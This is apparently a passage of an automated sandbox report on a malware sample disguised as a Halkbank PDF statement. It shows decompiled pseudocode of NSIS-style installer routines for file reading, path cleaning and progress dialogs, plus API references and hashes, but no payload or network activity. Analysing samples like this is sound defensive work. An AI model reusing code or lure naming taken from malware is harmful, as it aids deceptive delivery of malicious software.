                                                                    									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                    									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                                    									if(__eax == 0) {
                                                                    										goto L34;
                                                                    									} else {
                                                                    										__ecx =  *(__ebp - 0x40);
                                                                    										if(__ecx == __ebx) {
                                                                    											goto L34;
                                                                    										} else {
                                                                    											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                    											 *(__ebp - 0x4c) = __ecx;
                                                                    											 *(__ebp - 0x50) = __eax;
                                                                    											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                    												L28:
                                                                    												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                    											} else {
                                                                    												__ebp - 0x50 = __ebp + 0xa;
                                                                    												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                    													L21:
                                                                    													__eax =  *(__ebp - 0x50);
                                                                    												} else {
                                                                    													__edi =  *(__ebp - 0x4c);
                                                                    													__edi =  ~( *(__ebp - 0x4c));
                                                                    													while(1) {
                                                                    														_t22 = __ebp - 0x40;
                                                                    														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                    														__eax = 0xfffd;
                                                                    														 *(__ebp - 0x50) = 0xfffd;
                                                                    														if( *_t22 == 0) {
                                                                    															goto L22;
                                                                    														}
                                                                    														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                    														__edi = __edi + 1;
                                                                    														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                                    														__eax = __ebp + 0xa;
                                                                    														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                    															continue;
                                                                    														} else {
                                                                    															goto L21;
                                                                    														}
                                                                    														goto L22;
                                                                    													}
                                                                    												}
                                                                    												L22:
                                                                    												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                    													goto L28;
                                                                    												} else {
                                                                    													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                    														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                    															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                    															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                    														} else {
                                                                    															__ecx =  *(__ebp - 0xc);
                                                                    															__edx =  *(__ebp - 8);
                                                                    															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                    															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                    														}
                                                                    														goto L34;
                                                                    													} else {
                                                                    														__ecx =  *(__ebp - 0xc);
                                                                    														__edx =  *(__ebp - 8);
                                                                    														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                    														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                    														 *(__ebp - 0x38) = __eax;
                                                                    														if(__ax == __bx) {
                                                                    															goto L34;
                                                                    														} else {
                                                                    															goto L26;
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    								goto L37;
                                                                    								L26:
                                                                    								__eax =  *(__ebp - 8);
                                                                    							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                    						}
                                                                    						goto L34;
                                                                    					}
                                                                    				}
                                                                    				L37:
                                                                    				return 0;
                                                                    			}








                                                                    0x004026ec
                                                                    0x004026ee
                                                                    0x004026f1
                                                                    0x004026f3
                                                                    0x004026f6
                                                                    0x004026fb
                                                                    0x004026ff
                                                                    0x00402702
                                                                    0x00402705
                                                                    0x00402c2a
                                                                    0x00402c2d
                                                                    0x0040270b
                                                                    0x0040270b
                                                                    0x00402712
                                                                    0x00402714
                                                                    0x00402714
                                                                    0x0040271a
                                                                    0x0040287e
                                                                    0x0040287e
                                                                    0x00402881
                                                                    0x00402886
                                                                    0x004015b6
                                                                    0x0040292e
                                                                    0x0040292e
                                                                    0x00000000
                                                                    0x00402720
                                                                    0x00402721
                                                                    0x0040272c
                                                                    0x0040272f
                                                                    0x0040273b
                                                                    0x0040273f
                                                                    0x004027d7
                                                                    0x004027ef
                                                                    0x004027ff
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402745
                                                                    0x00402745
                                                                    0x00402748
                                                                    0x00402749
                                                                    0x0040274c
                                                                    0x00402751
                                                                    0x00402758
                                                                    0x00402760
                                                                    0x00000000
                                                                    0x00402766
                                                                    0x00402766
                                                                    0x0040276b
                                                                    0x00000000
                                                                    0x00402771
                                                                    0x00402771
                                                                    0x00402779
                                                                    0x0040277c
                                                                    0x0040277f
                                                                    0x0040283a
                                                                    0x00402841
                                                                    0x00402785
                                                                    0x0040278b
                                                                    0x00402797
                                                                    0x00402801
                                                                    0x00402801
                                                                    0x00402799
                                                                    0x00402799
                                                                    0x0040279c
                                                                    0x0040279e
                                                                    0x0040279e
                                                                    0x0040279e
                                                                    0x004027a1
                                                                    0x004027a6
                                                                    0x004027a9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004027ab
                                                                    0x004027ae
                                                                    0x004027bc
                                                                    0x004027c2
                                                                    0x004027d0
                                                                    0x00000000
                                                                    0x004027d2
                                                                    0x00000000
                                                                    0x004027d2
                                                                    0x00000000
                                                                    0x004027d0
                                                                    0x0040279e
                                                                    0x00402804
                                                                    0x00402807
                                                                    0x00000000
                                                                    0x00402809
                                                                    0x0040280e
                                                                    0x0040284f
                                                                    0x00402871
                                                                    0x00402878
                                                                    0x0040285d
                                                                    0x0040285d
                                                                    0x00402860
                                                                    0x00402863
                                                                    0x00402866
                                                                    0x00402866
                                                                    0x00000000
                                                                    0x00402817
                                                                    0x00402817
                                                                    0x0040281a
                                                                    0x0040281d
                                                                    0x00402823
                                                                    0x00402827
                                                                    0x0040282a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040282a
                                                                    0x0040280e
                                                                    0x00402807
                                                                    0x0040277f
                                                                    0x0040276b
                                                                    0x00402760
                                                                    0x00000000
                                                                    0x0040282c
                                                                    0x0040282c
                                                                    0x0040282f
                                                                    0x00402838
                                                                    0x00000000
                                                                    0x0040272f
                                                                    0x0040271a
                                                                    0x00402c33
                                                                    0x00402c39

                                                                    APIs
                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                      • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                    • String ID: 9
                                                                    • API String ID: 163830602-2366072709
                                                                    • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                    • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                    • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                    • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E004068EF(WCHAR* _a4) {
                                                                    				short _t5;
                                                                    				short _t7;
                                                                    				WCHAR* _t19;
                                                                    				WCHAR* _t20;
                                                                    				WCHAR* _t21;
                                                                    
                                                                    				_t20 = _a4;
                                                                    				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                    					_t20 =  &(_t20[4]);
                                                                    				}
                                                                    				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                                    					_t20 =  &(_t20[2]);
                                                                    				}
                                                                    				_t5 =  *_t20;
                                                                    				_t21 = _t20;
                                                                    				_t19 = _t20;
                                                                    				if(_t5 != 0) {
                                                                    					do {
                                                                    						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                                    							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                    							_t19 = CharNextW(_t19);
                                                                    						}
                                                                    						_t20 = CharNextW(_t20);
                                                                    						_t5 =  *_t20;
                                                                    					} while (_t5 != 0);
                                                                    				}
                                                                    				 *_t19 =  *_t19 & 0x00000000;
                                                                    				while(1) {
                                                                    					_push(_t19);
                                                                    					_push(_t21);
                                                                    					_t19 = CharPrevW();
                                                                    					_t7 =  *_t19;
                                                                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                    						break;
                                                                    					}
                                                                    					 *_t19 =  *_t19 & 0x00000000;
                                                                    					if(_t21 < _t19) {
                                                                    						continue;
                                                                    					}
                                                                    					break;
                                                                    				}
                                                                    				return _t7;
                                                                    			}








                                                                    0x004068f1
                                                                    0x004068fa
                                                                    0x00406911
                                                                    0x00406911
                                                                    0x00406918
                                                                    0x00406924
                                                                    0x00406924
                                                                    0x00406927
                                                                    0x0040692a
                                                                    0x0040692f
                                                                    0x00406931
                                                                    0x0040693a
                                                                    0x0040693e
                                                                    0x0040695b
                                                                    0x00406963
                                                                    0x00406963
                                                                    0x00406968
                                                                    0x0040696a
                                                                    0x0040696d
                                                                    0x00406972
                                                                    0x00406973
                                                                    0x00406977
                                                                    0x00406977
                                                                    0x00406978
                                                                    0x0040697f
                                                                    0x00406981
                                                                    0x00406988
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406990
                                                                    0x00406996
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406996
                                                                    0x0040699b

                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                    • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                    • CharNextW.USER32(?,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                    • CharPrevW.USER32(?,?,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 589700163-1201062745
                                                                    • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                    • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                    • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                    • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040302E(intOrPtr _a4) {
                                                                    				short _v132;
                                                                    				long _t6;
                                                                    				struct HWND__* _t7;
                                                                    				struct HWND__* _t15;
                                                                    
                                                                    				if(_a4 != 0) {
                                                                    					_t15 =  *0x420efc;
                                                                    					if(_t15 != 0) {
                                                                    						_t15 = DestroyWindow(_t15);
                                                                    					}
                                                                    					 *0x420efc = 0;
                                                                    					return _t15;
                                                                    				}
                                                                    				if( *0x420efc != 0) {
                                                                    					return E00406A71(0);
                                                                    				}
                                                                    				_t6 = GetTickCount();
                                                                    				if(_t6 >  *0x42a26c) {
                                                                    					if( *0x42a268 == 0) {
                                                                    						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                                    						 *0x420efc = _t7;
                                                                    						return ShowWindow(_t7, 5);
                                                                    					}
                                                                    					if(( *0x42a314 & 0x00000001) != 0) {
                                                                    						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                                    						return E004056CA(0,  &_v132);
                                                                    					}
                                                                    				}
                                                                    				return _t6;
                                                                    			}







                                                                    0x0040303d
                                                                    0x0040303f
                                                                    0x00403046
                                                                    0x00403049
                                                                    0x00403049
                                                                    0x0040304f
                                                                    0x00000000
                                                                    0x0040304f
                                                                    0x0040305d
                                                                    0x00000000
                                                                    0x00403060
                                                                    0x00403067
                                                                    0x00403073
                                                                    0x0040307b
                                                                    0x004030b9
                                                                    0x004030c2
                                                                    0x00000000
                                                                    0x004030c7
                                                                    0x00403084
                                                                    0x00403095
                                                                    0x00000000
                                                                    0x004030a3
                                                                    0x00403084
                                                                    0x004030cf

                                                                    APIs
                                                                    • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                                    • GetTickCount.KERNEL32 ref: 00403067
                                                                    • wsprintfW.USER32 ref: 00403095
                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                    • CreateDialogParamW.USER32 ref: 004030B9
                                                                    • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                      • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                    • String ID: ... %d%%
                                                                    • API String ID: 722711167-2449383134
                                                                    • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                    • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                    • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                    • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                                    				long _v8;
                                                                    				signed char _v12;
                                                                    				unsigned int _v16;
                                                                    				void* _v20;
                                                                    				intOrPtr _v24;
                                                                    				long _v56;
                                                                    				void* _v60;
                                                                    				long _t15;
                                                                    				unsigned int _t19;
                                                                    				signed int _t25;
                                                                    				struct HWND__* _t28;
                                                                    
                                                                    				_t28 = _a4;
                                                                    				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                    				if(_a8 == 0) {
                                                                    					L4:
                                                                    					_v56 = _t15;
                                                                    					_v60 = 4;
                                                                    					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                    					return _v24;
                                                                    				}
                                                                    				_t19 = GetMessagePos();
                                                                    				_v16 = _t19 >> 0x10;
                                                                    				_v20 = _t19;
                                                                    				ScreenToClient(_t28,  &_v20);
                                                                    				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                    				if((_v12 & 0x00000066) != 0) {
                                                                    					_t15 = _v8;
                                                                    					goto L4;
                                                                    				}
                                                                    				return _t25 | 0xffffffff;
                                                                    			}














                                                                    0x00404f8d
                                                                    0x00404f9a
                                                                    0x00404fa0
                                                                    0x00404fde
                                                                    0x00404fde
                                                                    0x00404fed
                                                                    0x00404ff4
                                                                    0x00000000
                                                                    0x00404ff6
                                                                    0x00404fa2
                                                                    0x00404fb1
                                                                    0x00404fb9
                                                                    0x00404fbc
                                                                    0x00404fce
                                                                    0x00404fd4
                                                                    0x00404fdb
                                                                    0x00000000
                                                                    0x00404fdb
                                                                    0x00000000

                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                    • GetMessagePos.USER32 ref: 00404FA2
                                                                    • ScreenToClient.USER32 ref: 00404FBC
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                    • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                    • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                                    				short _v132;
                                                                    				void* _t11;
                                                                    				WCHAR* _t19;
                                                                    
                                                                    				if(_a8 == 0x110) {
                                                                    					SetTimer(_a4, 1, 0xfa, 0);
                                                                    					_a8 = 0x113;
                                                                    				}
                                                                    				if(_a8 == 0x113) {
                                                                    					_t11 = E00403012();
                                                                    					_t19 = L"unpacking data: %d%%";
                                                                    					if( *0x42a270 == 0) {
                                                                    						_t19 = L"verifying installer: %d%%";
                                                                    					}
                                                                    					wsprintfW( &_v132, _t19, _t11);
                                                                    					SetWindowTextW(_a4,  &_v132);
                                                                    					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                    				}
                                                                    				return 0;
                                                                    			}






                                                                    0x00402fa3
                                                                    0x00402fb1
                                                                    0x00402fb7
                                                                    0x00402fb7
                                                                    0x00402fc5
                                                                    0x00402fc7
                                                                    0x00402fd3
                                                                    0x00402fd8
                                                                    0x00402fda
                                                                    0x00402fda
                                                                    0x00402fe5
                                                                    0x00402ff5
                                                                    0x00403007
                                                                    0x00403007
                                                                    0x0040300f

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                    • API String ID: 1451636040-1158693248
                                                                    • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                    • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                    • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                    • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E00402950(void* __ebx) {
                                                                    				WCHAR* _t26;
                                                                    				void* _t29;
                                                                    				long _t37;
                                                                    				void* _t49;
                                                                    				void* _t52;
                                                                    				void* _t54;
                                                                    				void* _t56;
                                                                    				void* _t59;
                                                                    				void* _t60;
                                                                    				void* _t61;
                                                                    
                                                                    				_t49 = __ebx;
                                                                    				_t52 = 0xfffffd66;
                                                                    				_t26 = E00402DA6(0xfffffff0);
                                                                    				_t55 = _t26;
                                                                    				 *(_t61 - 0x40) = _t26;
                                                                    				if(E00405FAE(_t26) == 0) {
                                                                    					E00402DA6(0xffffffed);
                                                                    				}
                                                                    				E00406133(_t55);
                                                                    				_t29 = E00406158(_t55, 0x40000000, 2);
                                                                    				 *(_t61 + 8) = _t29;
                                                                    				if(_t29 != 0xffffffff) {
                                                                    					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                    					if( *(_t61 - 0x28) != _t49) {
                                                                    						_t37 =  *0x42a274;
                                                                    						 *(_t61 - 0x44) = _t37;
                                                                    						_t54 = GlobalAlloc(0x40, _t37);
                                                                    						if(_t54 != _t49) {
                                                                    							E004035F8(_t49);
                                                                    							E004035E2(_t54,  *(_t61 - 0x44));
                                                                    							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                    							 *(_t61 - 0x10) = _t59;
                                                                    							if(_t59 != _t49) {
                                                                    								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                    								while( *_t59 != _t49) {
                                                                    									_t51 =  *_t59;
                                                                    									_t60 = _t59 + 8;
                                                                    									 *(_t61 - 0x3c) =  *_t59;
                                                                    									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                    									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                    								}
                                                                    								GlobalFree( *(_t61 - 0x10));
                                                                    							}
                                                                    							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                    							GlobalFree(_t54);
                                                                    							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                    						}
                                                                    					}
                                                                    					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                    					CloseHandle( *(_t61 + 8));
                                                                    				}
                                                                    				_t56 = 0xfffffff3;
                                                                    				if(_t52 < _t49) {
                                                                    					_t56 = 0xffffffef;
                                                                    					DeleteFileW( *(_t61 - 0x40));
                                                                    					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                    				}
                                                                    				_push(_t56);
                                                                    				E00401423();
                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                                    				return 0;
                                                                    			}













                                                                    0x00402950
                                                                    0x00402952
                                                                    0x00402957
                                                                    0x0040295c
                                                                    0x0040295f
